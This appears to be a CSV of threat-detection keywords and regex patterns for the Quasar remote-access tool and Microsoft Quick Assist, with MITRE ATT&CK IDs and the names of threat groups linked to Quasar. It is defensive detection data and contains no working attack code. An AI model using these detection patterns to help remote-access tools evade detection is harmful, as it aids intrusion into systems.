"*\Quasar.Common\*.cs*",".{0,1000}\\Quasar\.Common\\.{0,1000}\.cs.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\quasar.p12*",".{0,1000}\\quasar\.p12.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Quasar.v*.zip*",".{0,1000}\\Quasar\.v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Quasar-master*",".{0,1000}\\Quasar\-master.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Users\mthcht\AppData\Roaming\SubDir\Client.exe*",".{0,1000}\\Users\\mthcht\\AppData\\Roaming\\SubDir\\Client\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*\Windows\system32\SubDir\Client.exe*",".{0,1000}\\Windows\\system32\\SubDir\\Client\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*14CA405B-8BAC-48AB-9FBA-8FB5DF88FD0D*",".{0,1000}14CA405B\-8BAC\-48AB\-9FBA\-8FB5DF88FD0D.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*32A2A734-7429-47E6-A362-E344A19C0D85*",".{0,1000}32A2A734\-7429\-47E6\-A362\-E344A19C0D85.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1*",".{0,1000}9F5CF56A\-DDB2\-4F40\-AB99\-2A1DC47588E1.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Backdoor.Quasar*",".{0,1000}Backdoor\.Quasar.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*C7C363BA-E5B6-4E18-9224-39BC8DA73172*",".{0,1000}C7C363BA\-E5B6\-4E18\-9224\-39BC8DA73172.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*",".{0,1000}CFCD0759E20F29C399C9D4210BE614E4E020BEE8.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*localhost:4782*",".{0,1000}localhost\:4782.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*namespace Quasar.Client*",".{0,1000}namespace\sQuasar\.Client.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*namespace Quasar.Server*",".{0,1000}namespace\sQuasar\.Server.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*ping -n 10 localhost > nul*",".{0,1000}ping\s\-n\s10\slocalhost\s\>\snul.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar Client Startup*",".{0,1000}Quasar\sClient\sStartup.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar v*\Client-built.exe*",".{0,1000}Quasar\sv.{0,1000}\\Client\-built\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.Client.*",".{0,1000}Quasar\.Client\..{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.Common.Tests\*",".{0,1000}Quasar\.Common\.Tests\\.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.exe*",".{0,1000}Quasar\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.Server*",".{0,1000}Quasar\.Server.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.Server\Program.cs*",".{0,1000}Quasar\.Server\\Program\.cs.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.sln*",".{0,1000}Quasar\.sln.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar.v1.4.1.zip*",".{0,1000}Quasar\.v1\.4\.1\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*quasar/Quasar*",".{0,1000}quasar\/Quasar.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*Quasar-master.zip*",".{0,1000}Quasar\-master\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*QuasarRAT*",".{0,1000}QuasarRAT.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"*ylAo2kAlUS2kYkala!*",".{0,1000}ylAo2kAlUS2kYkala!.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z"
"* --webview-exe-name=QuickAssist.exe*",".{0,1000}\s\-\-webview\-exe\-name\=QuickAssist\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*/Assistance rapide Installer.exe*",".{0,1000}\/Assistance\srapide\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*/Assistenza rapida Installer.exe*",".{0,1000}\/Assistenza\srapida\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*/Quick Assist Installer.exe*",".{0,1000}\/Quick\sAssist\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*/Quick%20Assist%20Installer.exe*",".{0,1000}\/Quick\%20Assist\%20Installer\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\RemoteHelp\EBWebView*",".{0,1000}\\AppData\\Local\\Temp\\RemoteHelp\\EBWebView.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\Assistance rapide Installer.exe*",".{0,1000}\\Assistance\srapide\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\Assistenza rapida Installer.exe*",".{0,1000}\\Assistenza\srapida\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\bam\State\UserSettings\*\MicrosoftCorporationII.QuickAssist_*",".{0,1000}\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\.{0,1000}\\MicrosoftCorporationII\.QuickAssist_.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\Microsoft.RemoteAssistance.QuickAssist\*",".{0,1000}\\Microsoft\.RemoteAssistance\.QuickAssist\\.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\microsoft.remoteassistance.quickassist\*",".{0,1000}\\microsoft\.remoteassistance\.quickassist\\.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\Quick Assist Installer.exe*",".{0,1000}\\Quick\sAssist\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\QuickAssist.exe*",".{0,1000}\\QuickAssist\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\QuickAssist.pdb*",".{0,1000}\\QuickAssist\.pdb.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
